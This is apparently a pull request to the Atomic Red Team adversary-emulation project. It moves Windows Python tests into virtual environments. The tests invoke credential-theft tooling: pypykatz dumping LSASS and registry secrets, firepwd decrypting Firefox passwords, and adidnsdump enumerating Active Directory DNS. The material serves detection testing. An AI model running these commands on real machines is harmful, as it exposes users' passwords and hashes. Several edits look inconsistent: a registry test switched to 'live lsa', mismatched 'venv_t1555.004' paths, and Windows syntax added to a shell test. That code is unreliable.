### PR TITLE
Implementation of venv into Windows Python atomics

### DIFF
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -186,40 +186,43 @@ atomic_tests:
     Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
 
     Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
+
   supported_platforms:
   - windows
-  dependency_executor_name: command_prompt
+  input_arguments:
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+  dependency_executor_name: powershell
   dependencies:
   - description: |
       Computer must have python 3 installed
     prereq_command: |
-      py -3 --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
       Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
-      Computer must have pip installed
+      Computer must have venv configured at #{venv_path}
     prereq_command: |
-      py -3 -m pip --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
     get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      py -m venv "#{venv_path}"
   - description: |
-      pypykatz must be installed and part of PATH
+      pypykatz must be installed 
     prereq_command: |
-      pypykatz -h >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      pip install pypykatz
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
   executor:
     command: |
-      pypykatz live lsa
+      "#{venv_path}\Scripts\pypykatz" live lsa 
+    cleanup_command: |
+      del "%temp%\nanodump.dmp" > nul 2> nul
     name: command_prompt
     elevation_required: true
 - name: Dump LSASS.exe Memory using Out-Minidump.ps1

--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -25,35 +25,41 @@ atomic_tests:
 - name: Registry parse with pypykatz
   auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
   description: |
-    Parses registry hives to obtain stored credentials
+    Parses registry hives to obtain stored credentials.
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
   supported_platforms:
   - windows
-  dependency_executor_name: command_prompt
+  input_arguments:
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+  dependency_executor_name: powershell
   dependencies:
   - description: |
       Computer must have python 3 installed
     prereq_command: |
-      py -3 --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      echo "Python 3 must be installed manually"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+      invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+      Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
-      Computer must have pip installed
+      Computer must have venv configured at #{venv_path}
     prereq_command: |
-      py -3 -m pip --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
     get_prereq_command: |
-      echo "PIP must be installed manually"
+      py -m venv "#{venv_path}"
   - description: |
-      pypykatz must be installed and part of PATH
+      pypykatz must be installed 
     prereq_command: |
-      pypykatz -h >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      pip install pypykatz
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
   executor:
     command: |
-      pypykatz live registry
+      "#{venv_path}\Scripts\pypykatz" live lsa 
     name: command_prompt
     elevation_required: true
 - name: esentutl.exe SAM copy

--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -166,35 +166,35 @@ atomic_tests:
       description: hostname or ip address to connect to.
       type: string
       default: "192.168.1.1"
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
   dependency_executor_name: powershell
   dependencies:
   - description: |
       Computer must have python 3 installed
     prereq_command: |
-      if (python --version) {exit 0} else {exit 1}
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
       Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
-      Computer must have pip installed
+      Computer must have venv configured at #{venv_path}
     prereq_command: |
-      if (pip3 -V) {exit 0} else {exit 1}
+      if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      py -m venv "#{venv_path}"
   - description: |
-      adidnsdump must be installed and part of PATH
+      adidnsdump must be installed
     prereq_command: |
-      if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      pip3 install adidnsdump
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
   executor:
     command: |
-      adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+      "#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
     name: command_prompt
     elevation_required: true
 - name: Adfind - Enumerate Active Directory Computer Objects

--- a/atomics/T1046/T1046.yaml
+++ b/atomics/T1046/T1046.yaml
@@ -115,7 +115,7 @@ atomic_tests:
   - description: |
       Check if python exists on the machine
     prereq_command: |
-      if (python --version) {exit 0} else {exit 1}
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"

--- a/atomics/T1059.006/T1059.006.yaml
+++ b/atomics/T1059.006/T1059.006.yaml
@@ -31,6 +31,11 @@ atomic_tests:
           $which_python -c 'import requests' 2>/dev/null; echo $?
         get_prereq_command: |
           pip install requests
+      - description: |
+          pip-autoremove must be installed 
+        prereq_command: |
+          pip-autoremove -h >nul 2>&1
+          exit /b %errorlevel%
     executor: 
       command: |
         which_python=$(which python || which python3 || which python3.9 || which python2)
@@ -38,6 +43,7 @@ atomic_tests:
       name: sh
       cleanup_command: |
         rm #{payload_file_name} 
+        pip-autoremove pypykatz >nul 2> nul
   - name: 'Execute Python via scripts'
     auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
     description: Create Python file (.py) that downloads and executes shell script via executor arguments

--- a/atomics/T1555.003/T1555.003.yaml
+++ b/atomics/T1555.003/T1555.003.yaml
@@ -200,13 +200,15 @@ atomic_tests:
   description: |
     Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
     Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. 
+
+    Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
   supported_platforms:
   - windows
   input_arguments:
     Firepwd_Path:
       description: Filepath for Firepwd.py
       type: string
-      default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
     Out_Filepath:
       description: Filepath to output results to
       type: string
@@ -219,15 +221,12 @@ atomic_tests:
       description: Filepath to python
       type: string
       default: C:\Program Files\Python310\python.exe
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
   dependency_executor_name: powershell
   dependencies:
-  - description: |
-      Firepwd must exist at #{Firepwd_Path}
-    prereq_command: |
-      if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-    get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
   - description: |
       Firefox profile directory must be present
     prereq_command: |
@@ -257,37 +256,35 @@ atomic_tests:
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
       Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
-      Pip must be installed.
+      Computer must have venv configured at #{venv_path}
     prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip -v) {exit 0} else {exit 1}
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      py -m venv "#{venv_path}"
+  - description: |
+      Firepwd must exist at #{Firepwd_Path}
+    prereq_command: |
+      if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
   - description: |
       Pycryptodome library must be installed 
     prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip show pycryptodome) {exit 0} else {exit 1}
+      if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1}
     get_prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+      if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
   - description: |
       Pyasn1 library must be installed 
     prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (pip show pyasn1) {exit 0} else {exit 1}
+      if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1}
     get_prereq_command: |
-      $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-      if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+      if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
   executor:
     name: powershell
     command: |
       $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-      cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+      cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
       cat #{Out_Filepath}
     cleanup_command: |
       Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue   


### PR DESCRIPTION
**Details:**
This change implements the use of virtual environments within atomics on Windows that make use of pip to install "malicious" dependencies. A [discussion on slack](https://atomicredteam.slack.com/archives/CB5DLF002/p1708703392821749) is available detailing the workflow of this issue.

The changes in this PR aim to make it easier for users of ART to remove files that are often flagged as malicious. When performing a large test case on an environment it is not unheard of that the AV will trigger in atomics following the atomic using the malicious pip package, leading to false positives being raised. 

Each of tests create a `ExternalPayloads\venv_[tactic_id]` folder, in keeping with the guidance for not removing dependences the virtual environment is not automatically deleted with the `-Cleanup` command, but due to where the virtual environment has been created and the naming used, a user can easily have their execution framework handler remove the folder after the test has been completed, resulting in a cleaner system than if the artefacts remained.

**Testing:**
All atomics tested on Windows 10.
